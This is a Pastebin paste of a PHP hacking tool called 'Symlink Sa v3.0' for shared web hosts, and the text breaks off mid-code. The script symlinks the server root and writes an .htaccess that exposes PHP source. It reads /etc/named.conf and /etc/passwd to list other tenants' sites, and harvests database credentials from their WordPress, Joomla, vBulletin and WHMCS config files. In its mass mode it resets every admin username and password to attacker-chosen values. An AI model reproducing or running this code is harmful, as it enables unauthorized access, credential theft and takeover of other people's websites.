API tools faq
paste
Advertisement
jeckerx

symlink.php

jeckerx
Feb 9th, 2013
184
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.01 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3.  
  4. /*
  5.  
  6. .d8888. d88888b .o88b. db d8b db .o88b. .d88b. .88b d88.
  7. 88' YP 88' d8P Y8 88 I8I 88 d8P Y8 .8P Y8. 88'YbdP`88
  8. `8bo. 88ooooo 8P 88 I8I 88 8P 88 88 88 88 88
  9. `Y8b. 88~~~~~ 8b C8888D Y8 I8I 88 8b 88 88 88 88 88
  10. db 8D 88. Y8b d8 `8b d8'8b d8' db Y8b d8 `8b d8' 88 88 88
  11. `8888Y' Y88888P `Y88P' `8b8' `8d8' VP `Y88P' `Y88P' YP YP YP
  12.  
  13.  
  14. author..............: s3n4t00r
  15. home................: sec-w.com
  16. twitter.............: @s3n4t00r
  17. name tools..........: Symlink Sa v3.0
  18.  
  19. */
  20.  
  21.  
  22.  
  23. set_time_limit(0);
  24. error_reporting(0);
  25.  
  26.  
  27. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  28. $u = explode("/",$pageURL );
  29. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
  30.  
  31. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  32. $u = explode("/",$pageFTP );
  33. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  34.  
  35. ?>
  36. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  37. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  38.  
  39. <html xmlns="http://www.w3.org/1999/xhtml">
  40.  
  41. <head>
  42. <title>Symlink_Sa 3.0</title>
  43.  
  44. <style type="text/css">
  45.  
  46. html,body {
  47. margin: 0;
  48. padding: 0;
  49. outline: 0;
  50. }
  51. a{
  52.  
  53. font-size: 13px;
  54.  
  55. }
  56.  
  57.  
  58. body {
  59. direction: ltr;
  60. background-color:#F4F4F4;
  61. color: rgb(153, 153, 153);
  62. text-align: center
  63. }
  64.  
  65.  
  66.  
  67. input,textarea,select{
  68. font-weight: bold;
  69. color: #000000;
  70. }
  71.  
  72. input,textarea,select:hover{
  73. box-shadow: 0px 0px 4px #AAAAAA;
  74. }
  75.  
  76.  
  77. .hedr {
  78. font-family: Tahoma, Arial, sans-serif ;
  79. font-size: 22px;
  80.  
  81.  
  82. }
  83.  
  84. .cont a{
  85.  
  86. text-decoration: none;
  87. color:rgb(153, 153, 153);
  88. font-family: Tahoma, Arial, sans-serif ;
  89. font-size: 16px;
  90. text-shadow: 0px 0px 3px ;
  91. }
  92.  
  93. .cont a:hover{
  94.  
  95.  
  96. color: #EEEEEE ;
  97. text-shadow:0px 0px 3px #000000 ;
  98.  
  99.  
  100. }
  101.  
  102. .tmp tr td{
  103.  
  104. border: solid 1px #BBBBBB;
  105.  
  106. padding: 2px ;
  107. font-size: 13px;
  108. }
  109.  
  110. .tmp tr td a {
  111. text-decoration: none;
  112.  
  113.  
  114.  
  115. }
  116.  
  117. .foter{
  118. font-size: 9pt;
  119. color: #AAAAAA ;
  120. text-align: center
  121. }
  122.  
  123. .tmp tr td:hover{
  124.  
  125. box-shadow: 0px 0px 4px #888888;
  126.  
  127. }
  128. .fot{
  129.  
  130. font-family:Tahoma, Arial, sans-serif;
  131.  
  132. font-size: 11pt;
  133. }
  134. .for a : hover{
  135.  
  136. text-shadow: 0px 0px 1px #3366FF;
  137.  
  138. }
  139.  
  140.  
  141. .ir {
  142. color: #FF0000;
  143. }
  144.  
  145.  
  146.  
  147. </style>
  148.  
  149. </head>
  150.  
  151. <body>
  152.  
  153. <div class='all'>
  154.  
  155.  
  156. <?php
  157.  
  158. @mkdir('sym',0777);
  159. $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  160. $f =@fopen ('sym/.htaccess','w');
  161. fwrite($f , $htcs);
  162.  
  163.  
  164.  
  165. @symlink("/","sym/root");
  166.  
  167. $pg = basename(__FILE__);
  168.  
  169. echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
  170.  
  171. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
  172.  
  173. echo '<div class="cont">
  174.  
  175. [<a href="?"> Home </a>]
  176.  
  177. [<a href="?sws=sym"> User & Domains & Symlink </a>]
  178.  
  179. [<a href="?sws=sec"> Domains & Script </a>]
  180.  
  181. [ <a href="?sws=file"> Symlink File </a>]
  182.  
  183. [<a href="?sws=passwd"> Symlink Bypass </a>]
  184.  
  185. <br /><br />
  186.  
  187. [ <a href="?sws=read"> Bypass Read </a>]
  188.  
  189. [ <a href="?sws=joomla"> Mass Joomla </a>]
  190.  
  191. [ <a href="?sws=wp"> Mass WordPress </a>]
  192.  
  193. [ <a href="?sws=vb"> Mass vBulletin </a>]
  194.  
  195. [ <a href="?sws=help"> Help </a>]
  196.  
  197. <br /><br /><br />
  198.  
  199.  
  200.  
  201.  
  202.  
  203.  
  204. </div>';
  205.  
  206. if(isset($_REQUEST['sws']))
  207. {
  208.  
  209. switch ($_REQUEST['sws'])
  210. {
  211.  
  212.  
  213.  
  214.  
  215.  
  216. /// Domains + Scripts ///
  217.  
  218. case 'sec':
  219.  
  220. if(!@is_file('named.txt')){
  221.  
  222. $d00m = @file("/etc/named.conf");
  223.  
  224. }else{
  225.  
  226. $d00m = @file("named.txt");
  227.  
  228.  
  229. }
  230. if(!$d00m)
  231. {
  232.  
  233. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  234. }
  235. else
  236.  
  237. {
  238. echo "<div class='tmp'>
  239. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  240. foreach($d00m as $dom){
  241.  
  242. flush();
  243. flush();
  244.  
  245.  
  246.  
  247. if(eregi("zone",$dom)){
  248.  
  249. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  250.  
  251. flush();
  252.  
  253. if(@strlen(trim($domsws[1][0])) > 2){
  254.  
  255. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  256.  
  257. ///////////////////////////////////////////////////////////////////////////////////
  258.  
  259. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  260. $wpp=@get_headers($wpl);
  261. $wp=$wpp[0];
  262.  
  263. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  264. $wpp2=@get_headers($wp2);
  265. $wp12=$wpp2[0];
  266.  
  267. ///////////////////////////////
  268.  
  269. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  270. $joo=@get_headers($jo1);
  271. $jo=$joo[0];
  272.  
  273.  
  274. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  275. $joo2=@get_headers($jo2);
  276. $jo12=$joo2[0];
  277.  
  278. ////////////////////////////////
  279.  
  280. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  281. $vbb=@get_headers($vb1);
  282. $vb=$vbb[0];
  283.  
  284. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  285. $vbb2=@get_headers($vb2);
  286. $vb12=$vbb2[0];
  287.  
  288. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  289. $vbb3=@get_headers($vb3);
  290. $vb13=$vbb3[0];
  291.  
  292. /////////////////
  293.  
  294. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  295. $whh2= @get_headers($wh1);
  296. $wh=$whh2[0];
  297.  
  298. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  299. $whh2= @get_headers($wh2);
  300. $wh12=$whh2[0];
  301.  
  302. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  303. $whh3= @get_headers($wh3);
  304. $wh13=$whh3[0];
  305.  
  306. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  307. $whh5= @get_headers($wh5);
  308. $wh15=$whh5[0];
  309.  
  310. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  311. $whh4= @get_headers($wh4);
  312. $wh14=$whh4[0];
  313.  
  314.  
  315.  
  316. ////////////////////////////////////////////////////////////////////////////////
  317.  
  318. ////////// Wordpress ////////////
  319.  
  320. $pos = strpos($wp, "200");
  321. $config="&nbsp;";
  322.  
  323. if (strpos($wp, "200") == true )
  324. {
  325. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  326. }
  327. elseif (strpos($wp12, "200") == true)
  328. {
  329. $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  330. }
  331.  
  332. ///////////WHMCS////////
  333.  
  334. elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
  335. {
  336. $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  337.  
  338. }
  339. elseif (strpos($wh12, "200") == true)
  340. {
  341. $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  342. }
  343.  
  344. elseif (strpos($wh13, "200") == true)
  345. {
  346. $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  347.  
  348. }
  349.  
  350. ///////// Joomla to 4 ///////////
  351.  
  352. elseif (strpos($jo, "200") == true)
  353. {
  354. $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  355. }
  356.  
  357. elseif (strpos($jo12, "200") == true)
  358. {
  359. $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  360. }
  361.  
  362. //////////vBulletin to 4 ///////////
  363.  
  364. elseif (strpos($vb, "200") == true)
  365. {
  366. $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  367. }
  368.  
  369. elseif (strpos($vb12, "200") == true)
  370. {
  371. $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  372. }
  373.  
  374. elseif (strpos($vb13, "200") == true)
  375. {
  376. $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  377. }
  378.  
  379. else
  380. {
  381. continue;
  382. }
  383. flush();
  384. flush();
  385.  
  386. /////////////////////////////////////////////////////////////////////////////////////
  387.  
  388.  
  389.  
  390. $site = $user['name'] ;
  391.  
  392.  
  393.  
  394. flush();
  395.  
  396. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  397. <td>".$config."</td></tr>"; flush();
  398.  
  399. }
  400. }
  401. }
  402. }
  403.  
  404.  
  405.  
  406.  
  407. break;
  408.  
  409.  
  410. /// user + domine + symlink ///
  411.  
  412. case 'sym':
  413.  
  414. if(!is_file('named.txt')){
  415.  
  416. $d00m = @file("/etc/named.conf");
  417.  
  418. }else{
  419.  
  420. $d00m = @file("named.txt");
  421.  
  422.  
  423. }
  424. if(!$d00m)
  425. {
  426.  
  427. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  428. }
  429. else
  430.  
  431. {
  432. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  433. foreach($d00m as $dom){
  434.  
  435. if(eregi("zone",$dom)){
  436.  
  437. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  438.  
  439. flush();
  440.  
  441. if(strlen(trim($domsws[1][0])) > 2){
  442.  
  443. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  444.  
  445. flush();
  446.  
  447.  
  448.  
  449. $site = $user['name'] ;
  450.  
  451.  
  452. @symlink("/","sym/root");
  453.  
  454. $site = $domsws[1][0];
  455.  
  456. $ir = 'ir';
  457.  
  458. $il = 'il';
  459.  
  460. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  461. {
  462. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  463. }
  464.  
  465.  
  466. echo "
  467. <tr>
  468.  
  469. <td>
  470. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  471. </td>
  472.  
  473.  
  474. <td>
  475. ".$user['name']."
  476. </td>
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483. <td>
  484. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  485. </td>
  486.  
  487.  
  488. </tr></div> ";
  489.  
  490.  
  491. flush();
  492. flush();
  493.  
  494. }
  495. }
  496. }
  497. }
  498.  
  499.  
  500.  
  501.  
  502. break;
  503.  
  504.  
  505. /// file symlink ///
  506.  
  507. case 'file':
  508.  
  509. echo'
  510. The file path to symlink
  511.  
  512. <br /><br />
  513. <form method="post">
  514. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  515. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  516. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  517.  
  518.  
  519.  
  520. </form>
  521. ';
  522.  
  523. $pfile = $_POST['file'];
  524. $symfile = $_POST['symfile'];
  525. $symlink = $_POST['symlink'];
  526.  
  527. if ($symlink)
  528. {
  529.  
  530.  
  531. @mkdir('sym1',0777);
  532. $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
  533. $f =@fopen ('sym1/.htaccess','w');
  534. @fwrite($f , $c);
  535.  
  536. @symlink("$pfile","sym1/$symfile");
  537.  
  538. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  539.  
  540. }
  541.  
  542.  
  543.  
  544. break;
  545.  
  546. /// bypass read
  547.  
  548. case 'read':
  549.  
  550. echo "read /etc/named.conf";
  551. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  552. flush();
  553. flush();
  554.  
  555.  
  556. $file = '/etc/named.conf';
  557.  
  558.  
  559. $r3ad = @fopen($file, 'r');
  560. if ($r3ad){
  561. $content = @fread($r3ad, @filesize($file));
  562. echo "".htmlentities($content)."";
  563. }
  564. else if (!$r3ad)
  565. {
  566. $r3ad = @show_source($file) ;
  567. }
  568. else if (!$r3ad)
  569. {
  570. $r3ad = @highlight_file($file);
  571. }
  572. else if (!$r3ad)
  573. {
  574. $sm = @symlink($file,'sym.txt');
  575.  
  576.  
  577. if ($sm){
  578. $r3ad = @fopen('sym/sym.txt', 'r');
  579. $content = @fread($r3ad, @filesize($file));
  580. echo "".htmlentities($content)."";
  581.  
  582. }
  583. }
  584.  
  585.  
  586.  
  587. echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
  588.  
  589.  
  590. if(isset($_GET['save'])){
  591.  
  592.  
  593. $cont = stripcslashes($_POST['file']);
  594.  
  595. $f = fopen('named.txt','w');
  596.  
  597. $w = fwrite($f,$cont);
  598.  
  599. if($w){
  600.  
  601. echo '<br />save has been successfully';
  602.  
  603. }
  604.  
  605. fclose($f);
  606.  
  607.  
  608.  
  609.  
  610. }
  611.  
  612.  
  613.  
  614. break;
  615.  
  616. // passwd
  617.  
  618. case 'passwd':
  619.  
  620. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  621.  
  622.  
  623. $cont = stripcslashes($_POST['file']);
  624.  
  625. if(!file_exists('passwd.txt')){
  626.  
  627. $f = @fopen('passwd.txt','w');
  628.  
  629. $w = @fwrite($f,$cont);
  630.  
  631. fclose($f);
  632. }
  633. if($w or @filesize('passwd.txt') > 0){
  634. // * SHOW * //
  635.  
  636. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  637. flush();
  638.  
  639. $fil3 = file('passwd.txt');
  640.  
  641. foreach ($fil3 as $f){
  642.  
  643. $u=explode(':', $f);
  644. $user = $u['0'];
  645.  
  646.  
  647.  
  648. echo "
  649. <tr>
  650.  
  651.  
  652.  
  653. <td width='15%'>
  654. $user
  655. </td>
  656.  
  657.  
  658.  
  659.  
  660.  
  661.  
  662. <td width='10%'>
  663. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  664. </td>
  665.  
  666. <td width='10%'>
  667. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  668. </td>
  669.  
  670.  
  671.  
  672. </tr></div> ";
  673.  
  674.  
  675. flush();
  676. flush();
  677.  
  678.  
  679. }
  680.  
  681.  
  682.  
  683.  
  684.  
  685.  
  686. die ("</tr></div>");
  687.  
  688.  
  689. }
  690.  
  691.  
  692.  
  693.  
  694.  
  695. }
  696.  
  697.  
  698.  
  699. echo "read /etc/passwd";
  700. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  701. flush();
  702.  
  703. $file = '/etc/passwd';
  704.  
  705.  
  706. $r3ad = @fopen($file, 'r');
  707. if ($r3ad){
  708. $content = @fread($r3ad, @filesize($file));
  709. echo "".htmlentities($content)."";
  710. }
  711. elseif(!$r3ad)
  712. {
  713. $r3ad = @show_source($file) ;
  714. }
  715. elseif(!$r3ad)
  716. {
  717. $r3ad = @highlight_file($file);
  718. }
  719. elseif(!$r3ad)
  720. {
  721.  
  722. for($uid=0;$uid<1000;$uid++){
  723. $ara = posix_getpwuid($uid);
  724. if (!empty($ara)) {
  725. while (list ($key, $val) = each($ara)){
  726. print "$val:";
  727. }
  728. print "\n";
  729. }
  730.  
  731. }
  732.  
  733. }
  734.  
  735.  
  736. flush();
  737.  
  738.  
  739. echo "</textarea><br /><br /><input type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  740. flush();
  741.  
  742. break;
  743.  
  744.  
  745.  
  746. case 'joomla':
  747.  
  748. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  749.  
  750.  
  751. if(isset($_POST['s'])){
  752.  
  753. $file = @file_get_contents('joomla.txt');
  754.  
  755. $ex = explode("\n",$file);
  756.  
  757. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  758. flush();
  759.  
  760.  
  761. foreach ($ex as $exp){
  762.  
  763. $es = explode("||",$exp);
  764.  
  765. $config = $es[0];
  766.  
  767. $domin = $es[1];
  768.  
  769. $domins = trim($domin).'';
  770.  
  771. $readconfig = @file_get_contents(trim($config));
  772.  
  773. if(ereg('JConfig',$readconfig)){
  774.  
  775.  
  776.  
  777. $pass = ex($readconfig,'$password = \'',"';");
  778.  
  779. $userdb = ex($readconfig,'$user = \'',"';");
  780.  
  781. $db = ex($readconfig,'$db = \'',"';");
  782.  
  783. $fix = ex($readconfig,'$dbprefix = \'',"';");
  784.  
  785. $tab = $fix.'users';
  786.  
  787.  
  788. $con = @mysql_connect('localhost',$userdb,$pass);
  789.  
  790. $db = @mysql_select_db($db,$con);
  791.  
  792. $query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'");
  793.  
  794.  
  795. $query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  796.  
  797.  
  798. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
  799.  
  800. $domins = trim($domin).'';
  801.  
  802. echo "<tr>
  803. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  804. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  805. flush();
  806.  
  807.  
  808.  
  809. }else{
  810.  
  811. echo "<tr>
  812. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  813. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  814. flush();
  815.  
  816. }
  817.  
  818. }
  819.  
  820.  
  821.  
  822.  
  823.  
  824.  
  825.  
  826.  
  827.  
  828. die();
  829.  
  830. }
  831.  
  832. if(!is_file('named.txt')){
  833.  
  834. $d00m = @file("/etc/named.conf");
  835.  
  836. flush();
  837.  
  838.  
  839. }else{
  840.  
  841. $d00m = file("named.txt");
  842.  
  843.  
  844. }
  845. if(!$d00m)
  846. {
  847.  
  848. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  849. }
  850. else
  851.  
  852. {
  853. echo "<div class='tmp'>
  854. <form method='POST' action='$pg?sws=joomla'>
  855. <input type='submit' value='Mass ching Admin' />
  856. <input type='hidden' value='1' name='s' />
  857. </form><br /><br />
  858. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  859.  
  860. $f = fopen('joomla.txt','w');
  861.  
  862. foreach($d00m as $dom){
  863.  
  864. if(eregi("zone",$dom)){
  865.  
  866. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  867.  
  868. if(strlen(trim($domsws[1][0])) > 2){
  869.  
  870. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  871.  
  872. ///////////////////////////////////////////////////////////////////////////////////
  873.  
  874. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  875. $wpp=get_headers($wpl);
  876. $wp=$wpp[0];
  877.  
  878. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
  879. $wpp2=get_headers($wp2);
  880. $wp12=$wpp2[0];
  881.  
  882. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  883. $wpp3=get_headers($wp3);
  884. $wp13=$wpp3[0];
  885.  
  886.  
  887. ////////// joomla ////////////
  888.  
  889. $pos = strpos($wp, "200");
  890. $config="&nbsp;";
  891.  
  892. if (strpos($wp, "200") == true )
  893. {
  894. $config= $wpl;
  895. }
  896. elseif (strpos($wp12, "200") == true)
  897. {
  898. $config= $wp2;
  899. }
  900. elseif (strpos($wp13, "200") == true)
  901. {
  902. $config= $wp3;
  903. }
  904. else
  905. {
  906. continue;
  907.  
  908. }
  909. flush();
  910.  
  911. /////////////////////////////////////////////////////////////////////////////////////
  912.  
  913. $dom = $domsws[1][0];
  914.  
  915. $w = fwrite($f,"$config||$dom \n");
  916. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  917.  
  918.  
  919. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  920. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  921.  
  922.  
  923.  
  924.  
  925.  
  926. flush();
  927.  
  928.  
  929. }
  930. }
  931. }
  932. }
  933.  
  934.  
  935. break;
  936.  
  937. case 'wp':
  938.  
  939. ############################ index #########################3
  940.  
  941.  
  942.  
  943.  
  944.  
  945.  
  946. ######## admin ##########33
  947.  
  948. if(isset($_POST['s'])){
  949.  
  950. $file = @file_get_contents('wp.txt');
  951.  
  952. $ex = explode("\n",$file);
  953.  
  954. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  955. flush();
  956. flush();
  957.  
  958.  
  959. foreach ($ex as $exp){
  960.  
  961. $es = explode("||",$exp);
  962.  
  963. $config = $es[0];
  964.  
  965. $domin = $es[1];
  966.  
  967. $domins = trim($domin).'';
  968.  
  969. $readconfig = @file_get_contents(trim($config));
  970.  
  971. if(ereg('wp-settings.php',$readconfig)){
  972.  
  973.  
  974.  
  975. $pass = ex($readconfig,"define('DB_PASSWORD', '","');");
  976.  
  977. $userdb = ex($readconfig,"define('DB_USER', '","');");
  978.  
  979. $db = ex($readconfig,"define('DB_NAME', '","');");
  980.  
  981. $fix = ex($readconfig,'$table_prefix = \'',"';");
  982.  
  983. $tab = $fix.'users';
  984.  
  985. $con = @mysql_connect('localhost',$userdb,$pass);
  986.  
  987. $db = @mysql_select_db($db,$con);
  988.  
  989. $query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
  990.  
  991. $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  992.  
  993.  
  994.  
  995. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
  996.  
  997. else
  998.  
  999. {
  1000.  
  1001. $r = '<b style="color:red">failed</b>';
  1002.  
  1003. }
  1004.  
  1005. $domins = trim($domin).'';
  1006.  
  1007. echo "<tr>
  1008. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1009. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1010.  
  1011. flush();
  1012. flush();
  1013.  
  1014.  
  1015.  
  1016.  
  1017.  
  1018.  
  1019. }else{
  1020.  
  1021. echo "<tr>
  1022. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1023. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1024.  
  1025. flush();
  1026. flush();
  1027.  
  1028. }
  1029.  
  1030. }
  1031.  
  1032.  
  1033.  
  1034.  
  1035.  
  1036.  
  1037.  
  1038.  
  1039.  
  1040.  
  1041. die();
  1042.  
  1043. }
  1044.  
  1045. if(!is_file('named.txt')){
  1046.  
  1047. $d00m = @file("/etc/named.conf");
  1048.  
  1049. }else{
  1050.  
  1051. $d00m = @file("named.txt");
  1052.  
  1053.  
  1054. }
  1055. if(!$d00m)
  1056. {
  1057.  
  1058. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1059. }
  1060. else
  1061.  
  1062. {
  1063. echo "<div class='tmp'>
  1064. <form method='POST' action='$pg?sws=wp'>
  1065. <input type='submit' value='Mass Change Admin' />
  1066. <input type='hidden' value='1' name='s' />
  1067. </form>
  1068. <br /><br />
  1069. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1070.  
  1071. flush();
  1072. flush();
  1073.  
  1074. $f = fopen('wp.txt','w');
  1075.  
  1076. foreach($d00m as $dom){
  1077.  
  1078. if(eregi("zone",$dom)){
  1079.  
  1080. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1081.  
  1082. if(strlen(trim($domsws[1][0])) > 2){
  1083.  
  1084. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1085.  
  1086. ///////////////////////////////////////////////////////////////////////////////////
  1087.  
  1088. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  1089. $wpp=get_headers($wpl);
  1090. $wp=$wpp[0];
  1091.  
  1092. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  1093. $wpp2=get_headers($wp2);
  1094. $wp12=$wpp2[0];
  1095.  
  1096. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
  1097. $wpp3=get_headers($wp3);
  1098. $wp13=$wpp3[0];
  1099.  
  1100.  
  1101. ////////// wp ////////////
  1102.  
  1103. $pos = strpos($wp, "200");
  1104. $config="&nbsp;";
  1105.  
  1106. if (strpos($wp, "200") == true )
  1107. {
  1108. $config= $wpl;
  1109. }
  1110. elseif (strpos($wp12, "200") == true)
  1111. {
  1112. $config= $wp2;
  1113. }
  1114. elseif (strpos($wp13, "200") == true)
  1115. {
  1116. $config= $wp3;
  1117. }
  1118. else
  1119. {
  1120. continue;
  1121.  
  1122. }
  1123. flush();
  1124.  
  1125. /////////////////////////////////////////////////////////////////////////////////////
  1126.  
  1127. $dom = $domsws[1][0];
  1128.  
  1129. $w = fwrite($f,"$config||$dom \n");
  1130. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1131.  
  1132.  
  1133. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1134. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1135. flush();
  1136. flush();
  1137.  
  1138.  
  1139.  
  1140.  
  1141.  
  1142. flush();
  1143.  
  1144.  
  1145. }
  1146. }
  1147. }
  1148. }
  1149.  
  1150.  
  1151. break;
  1152.  
  1153.  
  1154. case 'vb':
  1155.  
  1156.  
  1157. if(isset($_POST['s'])){
  1158.  
  1159.  
  1160.  
  1161. $file = @file_get_contents('vb.txt');
  1162.  
  1163. $ex = explode("\n",$file);
  1164.  
  1165. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1166.  
  1167.  
  1168. foreach ($ex as $exp){
  1169.  
  1170. $es = explode("||",$exp);
  1171.  
  1172. $config = $es[0];
  1173.  
  1174. $domin = $es[1];
  1175.  
  1176. $domins = trim($domin).'';
  1177.  
  1178. $readconfig = @file_get_contents(trim($config));
  1179.  
  1180. if(ereg('vBulletin',$readconfig)){
  1181.  
  1182.  
  1183.  
  1184. $db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1185.  
  1186. $userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  1187.  
  1188. $pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1189.  
  1190. $con = @mysql_connect('localhost',$userdb,$pass);
  1191.  
  1192. $db = @mysql_select_db($db,$con);
  1193.  
